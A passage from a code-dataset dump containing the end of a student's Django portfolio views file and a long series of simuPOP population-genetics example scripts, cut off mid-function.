'portfolio/novo_cadeira.html', context)\n\ndef editar_cadeira_view(request, topico_id):\n    topico = Cadeira.objects.get(id=topico_id)\n    form = CadeiraForm(request.POST or None, instance=topico)\n\n    if form.is_valid():\n        form.save()\n        return HttpResponseRedirect(reverse('portfolio:licenciatura'))\n\n    context = {'form': form, 'topico_id': topico_id}\n    return render(request, 'portfolio/editar_licenciatura.html', context)\n\ndef apagar_cadeira_view(request, topico_id):\n    Cadeira.objects.get(id=topico_id).delete()\n    return HttpResponseRedirect(reverse('portfolio:licenciatura'))\n\ndef novo_tfc_view(request):\n    form = TFCForm(request.POST or None)\n    if form.is_valid():\n        form.save()\n        return HttpResponseRedirect(reverse('portfolio:tfc'))\n\n    context = {'form': form}\n    return render(request, 'portfolio/novo.html', context)\n\ndef editar_tfc_view(request, topico_id):\n    topico = TFC.objects.get(id=topico_id)\n    form = TFCForm(request.POST or None, instance=topico)\n\n    if form.is_valid():\n        form.save()\n        return HttpResponseRedirect(reverse('portfolio:tfc'))\n\n    context = {'form': form, 'topico_id': topico_id}\n    return render(request, 
'portfolio/editar_tfc.html', context)\n\ndef apagar_tfc_view(request, topico_id):\n TFC.objects.get(id=topico_id).delete()\n return HttpResponseRedirect(reverse('portfolio:tfc'))\n\ndef login_view(request):\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n\n user = authenticate(\n request,\n username=username,\n password=password)\n\n if user is not None:\n login(request, user)\n return HttpResponseRedirect(reverse('portfolio:home'))\n else:\n return render(request, 'portfolio/login.html', {\n 'message': 'Credenciais invalidas.'\n })\n\n return render(request, 'portfolio/login.html')\n\ndef logout_view(request):\n logout(request)\n\n return render(request, 'portfolio/login.html', {\n 'message': 'Foi desconetado.'\n })\n\ndef sobremim_view(request):\n return render(request,'portfolio/sobremim.html')\n\ndef projetos_geral_view(request):\n return render(request,'portfolio/projetos_geral.html')\n\ndef web_view(request):\n return render(request,'portfolio/web.html')\n\ndef tec_view(request):\n return render(request,'portfolio/tec.html')\n\ndef labs_view(request):\n return render(request, 'portfolio/labs.html')\n\ndef sobre_portfolio_view(request):\n return render(request, 'portfolio/sobreportfolio.html')\n\ndef contactos_view(request):\n return render(request, 'portfolio/contactos.html')\n\ndef noticias_view(request):\n return render(request, 'portfolio/noticias.html')\n\ndef curiosidadess_view(request):\n return render(request, 'portfolio/curiosidades.html')","repo_name":"joaobernardino-22003183/portfolio","sub_path":"portfolio/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"71334492899","text":"#!/usr/bin/env python\n\n#begin_file log/importSimuPOP.py\nimport simuOpt\nsimuOpt.setOptions(optimized=False, alleleType='long', quiet=False)\nimport simuPOP as sim\n#end_file\n\n#begin_file log/standard.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\n#expect_error\npop = sim.Population(10, loci=2)\npop.locusPos(10)\npop.individual(20).setAllele(1, 0)\n#end_file\n\n#begin_file log/simpleExample.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=1000, loci=2)\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(genotype=[1, 2, 2, 1])\n ],\n matingScheme=sim.RandomMating(ops=sim.Recombinator(rates=0.01)),\n postOps=[\n sim.Stat(LD=[0, 1], step=10),\n sim.PyEval(r\"'%.2f\\n' % LD[0][1]\", step=10),\n ],\n gen=100\n)\n#end_file\n\n#begin_file log/help.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nhelp(sim.Population.addInfoFields)\n#end_file\n\n#begin_file log/absIndex.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[10, 20], loci=[5, 7])\nprint(pop.chromLocusPair(7))\nprint(pop.absLocusIndex(1, 1))\nprint(pop.absIndIndex(2, 1))\nprint(pop.subPopIndPair(25))\n#end_file\n\n#begin_file log/iterator.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as 
sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=2, loci=[5, 6])\nsim.initGenotype(pop, freq=[0.2, 0.3, 0.5])\nfor ind in pop.individuals():\n for loc in range(pop.chromBegin(1), pop.chromEnd(1)):\n print(ind.allele(loc))\n\n#end_file\n\n#begin_file log/defdict.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population([100]*2, loci=1)\nsim.initGenotype(pop, freq=[0, 0.2, 0.8], subPops=0)\nsim.initGenotype(pop, freq=[0.2, 0.8], subPops=1)\nsim.stat(pop, alleleFreq=0, vars=['alleleFreq_sp'])\nfor sp in range(2):\n print('Subpop %d (with %d alleles): ' % (sp, len(pop.dvars(sp).alleleFreq[0])))\n for a in range(3):\n print('%.2f ' % pop.dvars(sp).alleleFreq[0][a])\n\n#end_file\n\n\n#begin_file log/userFunc.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport random\npop = sim.Population(1000, loci=1, infoFields='smoking')\nsim.initInfo(pop, lambda:random.randint(0,1), infoFields='smoking')\nsim.initGenotype(pop, freq=[0.3, 0.7])\n\n# a penetrance function that depends on smoking\ndef func(geno, smoking):\n if smoking:\n return (geno[0]+geno[1])*0.4\n else:\n return (geno[0]+geno[1])*0.1\n\nsim.pyPenetrance(pop, loci=0, func=func)\nsim.stat(pop, numOfAffected=True)\nprint(pop.dvars().numOfAffected)\n\n#end_file\n\n#begin_file log/WithArgs.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport random\npop = sim.Population(1000, loci=1, infoFields=('x', 'y'))\nsim.initInfo(pop, lambda:random.randint(0,1), infoFields=('x', 'y'))\nsim.initGenotype(pop, freq=[0.3, 0.7])\n\n# a penetrance function that depends on unknown information fields\ndef func(*fields):\n return 0.4*sum(fields)\n\n# function WithArgs tells PyPenetrance that func accepts fields x, y so that\n# it will pass values at fields x and y to func.\nsim.pyPenetrance(pop, loci=0, func=sim.WithArgs(func, pop.infoFields()))\nsim.stat(pop, numOfAffected=True)\nprint(pop.dvars().numOfAffected)\n#end_file\n\n#begin_file log/genoStru.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[2, 3], ploidy=2, loci=[5, 10],\n lociPos=list(range(0, 5)) + list(range(0, 20, 2)), chromNames=['Chr1', 'Chr2'],\n alleleNames=['A', 'C', 'T', 'G'])\n# access genotypic information from the sim.Population\npop.ploidy()\npop.ploidyName()\npop.numChrom()\npop.locusPos(2)\npop.alleleName(1)\n# access from an individual\nind = pop.individual(2)\nind.numLoci(1)\nind.chromName(0)\nind.locusName(1)\n# utility functions\nind.chromBegin(1)\nind.chromByName('Chr2')\n# loci pos can be unordered within each chromosome\npop = sim.Population(loci=[2, 3], lociPos=[3, 1, 1, 3, 2],\n lociNames=['loc%d' % x for x in range(5)])\npop.lociPos()\npop.lociNames()\n#end_file\n\n#begin_file log/haplodiploid.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[2,5], ploidy=sim.HAPLODIPLOID, loci=[3, 5])\nsim.initGenotype(pop, freq=[0.3, 0.7])\nsim.dump(pop)\n#end_file\n\n#begin_file log/chromType.py\n#begin_ignore\nimport 
simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=6, ploidy=2, loci=[3, 3, 3, 2, 2, 4, 4],\n    chromTypes=[sim.AUTOSOME]*2 + [sim.CHROMOSOME_X, sim.CHROMOSOME_Y, sim.MITOCHONDRIAL]\n    + [sim.CUSTOMIZED]*2)\nsim.initGenotype(pop, freq=[0.3, 0.7])\nsim.dump(pop, structure=False) # does not display genotypic structure information\n#end_file\n\n#begin_file log/infoField.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(10, loci=[20], ancGen=1,\n    infoFields=['father_idx', 'mother_idx'])\npop.evolve(\n    initOps=[\n        sim.InitSex(),\n        sim.InitGenotype(genotype=[0]*20+[1]*20)\n    ],\n    matingScheme=sim.RandomMating(\n        ops=[\n            sim.Recombinator(rates=0.01),\n            sim.ParentsTagger()\n        ]\n    ),\n    gen = 1\n)\npop.indInfo('mother_idx') # mother of all offspring\nind = pop.individual(0)\nmom = pop.ancestor(ind.mother_idx, 1)\nprint(ind.genotype(0))\nprint(mom.genotype(0))\nprint(mom.genotype(1))\n#end_file\n\n#begin_file log/individual.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population([5, 4], loci=[2, 5], infoFields='x')\n# get an individual\nind = pop.individual(3)\nind.ploidy() # access to genotypic structure\nind.numChrom()\nind.affected()\nind.setAffected(True) # access affection status,\nind.sex() # sex,\nind.setInfo(4, 'x') # and information fields\nind.x = 5 # the same as ind.setInfo(4, 'x')\nind.info('x') # get information field x\nind.x # the same as ind.info('x')\n#end_file\n\n#begin_file log/individualGenotype.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population([2, 1], loci=[2, 5])\nfor ind in pop.individuals(1):\n    for marker in range(pop.totNumLoci()):\n        ind.setAllele(marker % 2, marker, 0)\n        ind.setAllele(marker % 2, marker, 1)\n        print('%d %d ' % (ind.allele(marker, 0), ind.allele(marker, 1)))\n\nind = pop.individual(1)\ngeno = ind.genotype(1) # the second homologous copy\ngeno\ngeno[2] = 3\nind.genotype(1)\ngeno[2:4] = [3, 4] # direct modification of the underlying genotype\nind.genotype(1)\n# set genotype (genotype, ploidy, chrom)\nind.setGenotype([2, 1], 1, 1)\ngeno\n#\ngeno.count(1) # count\ngeno.index(2) # index \nind.setAllele(5, 3) # change underlying genotype using setAllele\nprint(geno) # geno is changed as well, since it refers to the underlying genotype\ngeno[2:5] = 4 # can use regular Python slice operation\nprint(ind.genotype())\n#end_file\n\n\n#begin_file log/subPop.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[3, 4, 5], ploidy=1, loci=1, infoFields='x')\n# individual 0, 1, 2, ... 
will have an allele 0, 1, 2, ...\npop.setGenotype(range(pop.popSize()))\n#\npop.subPopSize(1)\n# merge subpopulations\npop.mergeSubPops([1, 2])\n# split subpopulations\npop.splitSubPop(1, [2, 7])\npop.subPopSizes()\n# remove subpopulations\npop.removeSubPops(1)\npop.subPopSizes()\n#end_file\n\n#begin_file log/subPopName.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[3, 4, 5], subPopNames=['x', 'y', 'z'])\npop.removeSubPops([1])\npop.subPopNames()\npop.subPopByName('z')\npop.splitSubPop(1, [2, 3])\npop.subPopNames()\npop.setSubPopName('z-1', 1)\npop.subPopNames()\npop.subPopByName('z')\n#end_file\n\n#begin_file log/virtualSplitter.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport random\npop = sim.Population(size=[200, 400], loci=[30], infoFields='x')\n# assign random information fields\nsim.initSex(pop)\nsim.initInfo(pop, lambda: random.randint(0, 3), infoFields='x')\n# define a virtual splitter by sex\npop.setVirtualSplitter(sim.SexSplitter())\npop.numVirtualSubPop() # Number of defined VSPs\npop.subPopName([0, 0]) # Each VSP has a name\npop.subPopSize([0, 1]) # Size of VSP 1 in subpopulation 0\npop.subPopSize([0, 'Female']) # Refer to vsp by its name\n# define a virtual splitter by information field 'x'\npop.setVirtualSplitter(sim.InfoSplitter(field='x', values=[0, 1, 2, 3]))\npop.numVirtualSubPop() # Number of defined VSPs\npop.subPopName([0, 0]) # Each VSP has a name\npop.subPopSize([0, 0]) # Size of VSP 0 in subpopulation 0\npop.subPopSize([1, 0]) # Size of VSP 0 in subpopulation 1\n#end_file\n\n#begin_file log/virtualSubPop.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport random\npop = sim.Population(10, loci=[2, 3], infoFields='Sex')\nsim.initSex(pop)\npop.setVirtualSplitter(sim.SexSplitter())\n# initialize male and females with different genotypes. 
\nsim.initGenotype(pop, genotype=[0]*5, subPops=[(0, 0)])\nsim.initGenotype(pop, genotype=[1]*5, subPops=[(0, 1)])\n# set Sex information field to 0 for all males, and 1 for all females\npop.setIndInfo([sim.MALE], 'Sex', [0, 0])\npop.setIndInfo([sim.FEMALE], 'Sex', [0, 1])\n# Print individual genotypes, followed by values at information field Sex\nsim.dump(pop, structure=False)\n#end_file\n\n\n#begin_file log/advancedVSP.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport random\npop = sim.Population(size=[2000, 4000], loci=[30], infoFields='x')\n# assign random information fields\nsim.initSex(pop)\nsim.initInfo(pop, lambda: random.randint(0, 3), infoFields='x')\n#\n# 1, use a combined splitter\npop.setVirtualSplitter(sim.CombinedSplitter(splitters = [\n sim.SexSplitter(),\n sim.InfoSplitter(field='x', values=[0, 1, 2, 3])\n]))\npop.numVirtualSubPop() # Number of defined VSPs\npop.subPopName([0, 0]) # Each VSP has a name\npop.subPopSize([0, 0]) # sim.MALE\npop.subPopSize([1, 4]) # individuals in sp 1 with value 2 at field x\n#\n# use a product splitter that defines additional VSPs by sex and info\npop.setVirtualSplitter(sim.ProductSplitter(splitters = [\n sim.SexSplitter(names=['M', 'F']), # give a new set of names\n sim.InfoSplitter(field='x', values=[0, 1, 2, 3])\n]))\npop.numVirtualSubPop() # Number of defined VSPs\npop.subPopName([0, 0]) # Each VSP has a name\npop.subPopSize([0, 0]) # sim.MALE with value 1 in sp 0\npop.subPopSize([1, 5]) # sim.FEMALE with value 1 in sp 1\n#\n# use a combined splitter to join VSPs defined by a\n# product splitter\npop.setVirtualSplitter(sim.CombinedSplitter([\n sim.ProductSplitter([\n sim.SexSplitter(),\n sim.InfoSplitter(field='x', values=[0, 1, 2, 3])])],\n vspMap = [[0,1,2], [4,5,6], [7]],\n names = ['Male x<=3', 'Female x<=3', 'Female x=4']))\npop.numVirtualSubPop() # Number of defined VSPs\npop.subPopName([0, 0]) # Each VSP has a name\npop.subPopSize([0, 0]) # sim.MALE with value 0, 1, 2 at field x\npop.subPopSize([1, 1]) # sim.FEMALE with value 0, 1 or 2 at field x\n#end_file\n\n\n#begin_file log/accessIndividual.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\n# create a sim.population with two generations. 
The current generation has values\n# 0-9 at information field x, the parental generation has values 10-19.\npop = sim.Population(size=[5, 5], loci=[2, 3], infoFields='x', ancGen=1)\npop.setIndInfo(range(10, 20), 'x')\npop1 = pop.clone()\npop1.setIndInfo(range(10), 'x')\npop.push(pop1)\n#\nind = pop.individual(5) # using absolute index\nind.info('x')\nind.x # the same as ind.info('x')\n# use a for loop, and relative index\nfor idx in range(pop.subPopSize(1)):\n    print(pop.individual(idx, 1).x)\n\n# It is usually easier to use an iterator\nfor ind in pop.individuals(1):\n    print(ind.x)\n\n# Access individuals in VSPs\npop.setVirtualSplitter(sim.InfoSplitter(cutoff=[3, 7, 17], field='x'))\nfor ind in pop.individuals([1, 1]):\n    print(ind.x)\n\n# Access all individuals in all ancestral generations\nprint([ind.x for ind in pop.allIndividuals()])\n# or only specified subpopulations or ancestral generations\nprint([ind.x for ind in pop.allIndividuals(subPops=[(0,2), (1,3)], ancGens=1)])\n\n# Access individuals in ancestral generations\npop.ancestor(5, 1).x # absolute index\npop.ancestor(0, 1, 1).x # relative index\n# Or make ancestral generation the current generation and use 'individual'\npop.useAncestralGen(1)\npop.individual(5).x # absolute index\npop.individual(0, 1).x # relative index\n# 'ancestor' can still access the 'present' (generation 0) generation\npop.ancestor(5, 0).x\n# access individual by ID\npop.addInfoFields('ind_id')\nsim.tagID(pop)\n[int(ind.ind_id) for ind in pop.individuals()]\n# access individual by ID. Note that individual 12 is in the parental generation\npop.indByID(12).x\n#end_file\n\n#begin_file log/batchAccess.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport random\npop = sim.Population(size=[4, 6], loci=2, infoFields='x')\npop.setIndInfo([random.randint(0, 10) for x in range(10)], 'x')\npop.indInfo('x')\npop.setGenotype([0, 1, 2, 3], 0)\npop.genotype(0)\npop.setVirtualSplitter(sim.InfoSplitter(cutoff=[3], field='x'))\npop.setGenotype([0]) # clear all values\npop.setGenotype([5, 6, 7], [1, 1])\npop.indInfo('x', 1)\npop.genotype(1)\n#end_file\n\n#begin_file log/popInfo.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(10)\npop.setInfoFields(['a', 'b'])\npop.addInfoFields('c')\npop.addInfoFields(['d', 'e'])\npop.infoFields()\n#\n# information fields can be accessed in batch mode\npop.setIndInfo([1], 'c')\n# as well as individually.\nfor ind in pop.individuals():\n    ind.e = ind.c + 1\n\nprint(pop.indInfo('e'))\n#end_file\n\n#begin_file log/ancestralPop.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(500, loci=1, ancGen=2)\npop.evolve(\n    initOps=[\n        sim.InitSex(),\n        sim.InitGenotype(freq=[0.5, 0.5])\n    ],\n    matingScheme = sim.RandomMating(),\n    postOps=[\n        sim.Stat(alleleFreq=0, begin=-3),\n        sim.PyEval(r\"'%.3f\\n' % alleleFreq[0][0]\", begin=-3)\n    ],\n    gen = 20\n)\n# information\npop.ancestralGens()\npop.popSize(ancGen=1)\npop.setVirtualSplitter(sim.SexSplitter())\n# number of males in the current and parental generation\npop.subPopSize((0,0)), pop.subPopSize((0,0), ancGen=1)\n# start from current generation\nfor i in range(pop.ancestralGens(), -1, -1):\n    pop.useAncestralGen(i)\n    sim.stat(pop, alleleFreq=0)\n    print('%d %.3f' % (i, 
pop.dvars().alleleFreq[0][0]))\n\n# restore to the current generation \npop.useAncestralGen(0) \n#end_file\n\n#begin_file log/addRemoveLoci.py\nimport simuOpt\n#begin_ignore\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nsimuOpt.setOptions(debug='DBG_WARNING')\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(10, loci=3, chromNames=['chr1'])\n# 1 1 1, \npop.setGenotype([1])\n# 1 1 1, 0 0 0\npop.addChrom(lociPos=[0.5, 1, 2], lociNames=['rs1', 'rs2', 'rs3'],\n    chromName='chr2')\npop1 = sim.Population(10, loci=3, chromNames=['chr3'],\n    lociNames=['rs4', 'rs5', 'rs6'])\n# 2 2 2,\npop1.setGenotype([2])\n# 1 1 1, 0 0 0, 2 2 2\npop.addChromFrom(pop1)\n# 1 1 1, 0 0 0, 2 0 2 2 0\npop.addLoci(chrom=[2, 2], pos=[1.5, 3.5], lociNames=['rs7', 'rs8'])\n# 1 1 1, 0 0 0, 2 0 2 0\npop.removeLoci(8)\n# loci names can also be used.\npop.removeLoci(['rs1', 'rs7'])\nsim.dump(pop)\n# add loci from another population \npop2 = sim.Population(10, loci=2, lociPos=[0.1, 2.2], chromNames='chr3')\npop.addLociFrom(pop2)\npop.addLociFrom(pop2, byName=2)\nsim.dump(pop, genotype=False)\n#end_file\n\n#begin_file log/recode.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(5, loci=[5], alleleNames=['A', 'T', 'C', 'G'])\nsim.initGenotype(pop, freq=[0.2, 0.3, 0.4, 0.1])\nsim.dump(pop, structure=False)\nprint(pop.genotype())\npop.recodeAlleles([0, 3, 1, 2], alleleNames=['A', 'C', 'G', 'T'])\nsim.dump(pop, structure=False)\nprint(pop.genotype())\n#end_file\n\n#begin_file log/extract.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport random\npop = sim.Population(size=[200, 200], loci=[5, 5], infoFields='age')\nsim.initGenotype(pop, genotype=range(10))\nsim.initInfo(pop, lambda: random.randint(0,75), infoFields='age')\npop.setVirtualSplitter(sim.InfoSplitter(field='age', cutoff=[20, 60]))\n# remove individuals\npop.removeIndividuals(indexes=range(0, 300, 10))\nprint(pop.subPopSizes())\n# remove individuals using IDs\npop.setIndInfo([1, 2, 3, 4], field='age')\npop.removeIndividuals(IDs=[2, 4], idField='age')\n# remove individuals using a filter function\nsim.initSex(pop)\npop.removeIndividuals(filter=lambda ind: ind.sex() == sim.MALE)\nprint([pop.individual(x).sex() for x in range(8)])\n#\n# remove subpopulation\npop.removeSubPops(1)\nprint(pop.subPopSizes())\n# remove virtual subpopulation (people with age between 20 and 60)\npop.removeSubPops([(0, 1)])\nprint(pop.subPopSizes())\n# extract another virtual subpopulation (people with age greater than 60)\npop1 = pop.extractSubPops([(0,2)])\nsim.dump(pop1, structure=False, max=10)\n#end_file\n\n\n#begin_file log/popVars.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nfrom pprint import pprint\npop = sim.Population(100, loci=2)\nsim.initGenotype(pop, freq=[0.3, 0.7])\nprint(pop.vars()) # No variable now\npop.dvars().myVar = 21\nprint(pop.vars())\nsim.stat(pop, popSize=1, alleleFreq=0)\n# pprint prints in a less messy format\npprint(pop.vars())\n# print number of allele 1 at locus 0\nprint(pop.vars()['alleleNum'][0][1])\n# use the dvars() function to access dictionary keys as attributes\nprint(pop.dvars().alleleNum[0][1])\nprint(pop.dvars().alleleFreq[0])\n#end_file\n\n#begin_file 
log/expression.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nsimu = sim.Simulator(sim.Population(100, loci=1), rep=5)\nsimu.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5])\n ],\n matingScheme = sim.RandomMating(),\n postOps=[\n sim.Stat(alleleFreq=0),\n sim.TerminateIf('len(alleleFreq[0]) == 1')\n ]\n)\n#end_file\n\n#begin_file log/savePop.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(100, loci=5, chromNames=['chrom1'])\npop.dvars().name = 'my sim.Population'\npop.save('sample.pop')\npop1 = sim.loadPopulation('sample.pop')\npop1.chromName(0)\npop1.dvars().name\n#begin_ignore\nimport os\nos.remove('sample.pop')\n#end_ignore\n#end_file\n\n\n\n#begin_file log/importExport.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True, gui=False)\n#end_ignore\nimport simuPOP as sim\nfrom simuPOP.utils import importPopulation, export\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population([2,4], loci=5, lociNames=['a1', 'a2', 'a3', 'a4', 'a5'],\n infoFields='BMI')\nsim.initGenotype(pop, freq=[0.3, 0.5, 0.2])\nsim.initSex(pop)\nsim.initInfo(pop, [20, 30, 40, 50, 30, 25], infoFields='BMI')\nexport(pop, format='fstat', output='fstat.txt')\nprint(open('fstat.txt').read())\nexport(pop, format='structure', phenotype='BMI', output='stru.txt')\nprint(open('stru.txt').read())\npop1 = importPopulation(format='fstat', filename='fstat.txt')\nsim.dump(pop1)\n#begin_ignore\nimport os\nos.remove('fstat.txt')\nos.remove('stru.txt')\n#end_ignore\n#end_file\n\n#begin_file log/importMS.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True, gui=False)\n#end_ignore\nimport simuPOP as sim\nfrom simuPOP.utils import importPopulation, export\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population([20,20], loci=[10, 10])\n# simulate a population but mutate only a subset of loci\npop.evolve(\n preOps=[\n sim.InitSex(),\n sim.SNPMutator(u=0.1, v=0.01, loci=range(5, 17))\n ],\n matingScheme=sim.RandomMating(),\n gen=100\n)\n# export first chromosome, all individuals\nexport(pop, format='ms', output='ms.txt')\n# export first chromosome, subpops as replicates\nexport(pop, format='ms', output='ms_subPop.txt', splitBy='subPop')\n# export all chromosomes, but limit to all males in subPop 1\npop.setVirtualSplitter(sim.SexSplitter())\nexport(pop, format='ms', output='ms_chrom.txt', splitBy='chrom', subPops=[(1,0)])\n# \nprint(open('ms_chrom.txt').read())\n# import as haploid sequence\npop = importPopulation(format='ms', filename='ms.txt')\n# import as diploid \npop = importPopulation(format='ms', filename='ms.txt', ploidy=2)\n# import as a single chromosome\npop = importPopulation(format='ms', filename='ms_subPop.txt', mergeBy='subPop')\n#begin_ignore\nimport os\nos.remove('ms.txt')\nos.remove('ms_subPop.txt')\nos.remove('ms_chrom.txt')\n#end_ignore\n#end_file\n\n#begin_file log/applicableGen.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(1000, loci=[20])\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.8, 0.2])\n ],\n preOps=[\n sim.PyEval(r\"'At the beginning of gen %d: allele Freq: %.2f\\n' % (gen, alleleFreq[0][0])\",\n at = [-10, -1])\n ],\n matingScheme = 
sim.RandomMating(),\n    postOps=[\n        sim.Stat(alleleFreq=0, begin=80, step=10),\n        sim.PyEval(r\"'At the end of gen %d: allele freq: %.2f\\n' % (gen, alleleFreq[0][0])\",\n            begin=80, step=10),\n        sim.PyEval(r\"'At the end of gen %d: allele Freq: %.2f\\n' % (gen, alleleFreq[0][0])\",\n            at = [-10, -1])\n    ],\n    finalOps=sim.SavePopulation(output='sample.pop'),\n    gen=100\n)\n#begin_ignore\nimport os\nos.remove('sample.pop')\n#end_ignore\n#end_file\n\n#begin_file log/replicate.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nsimu = sim.Simulator(sim.Population(100, loci=[20]), 5)\nsimu.evolve(\n    initOps=[\n        sim.InitSex(),\n        sim.InitGenotype(freq=[0.2, 0.8])\n    ],\n    matingScheme=sim.RandomMating(),\n    postOps=[\n        sim.Stat(alleleFreq=0, step=10),\n        sim.PyEval('gen', step=10, reps=0),\n        sim.PyEval(r\"'\\t%.2f' % alleleFreq[0][0]\", step=10, reps=(0, 2, -1)),\n        sim.PyOutput('\\n', step=10, reps=-1)\n    ],\n    gen=30,\n)\n#end_file\n\n#begin_file log/dynamicLoci.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(100, loci=[10], infoFields='fitness')\n\ndef mostPopular(pop):\n    sim.stat(pop, alleleFreq=sim.ALL_AVAIL)\n    freq = [pop.dvars().alleleFreq[x][1] for x in range(pop.totNumLoci())]\n    max_freq = max(freq)\n    pop.dvars().selLoci = 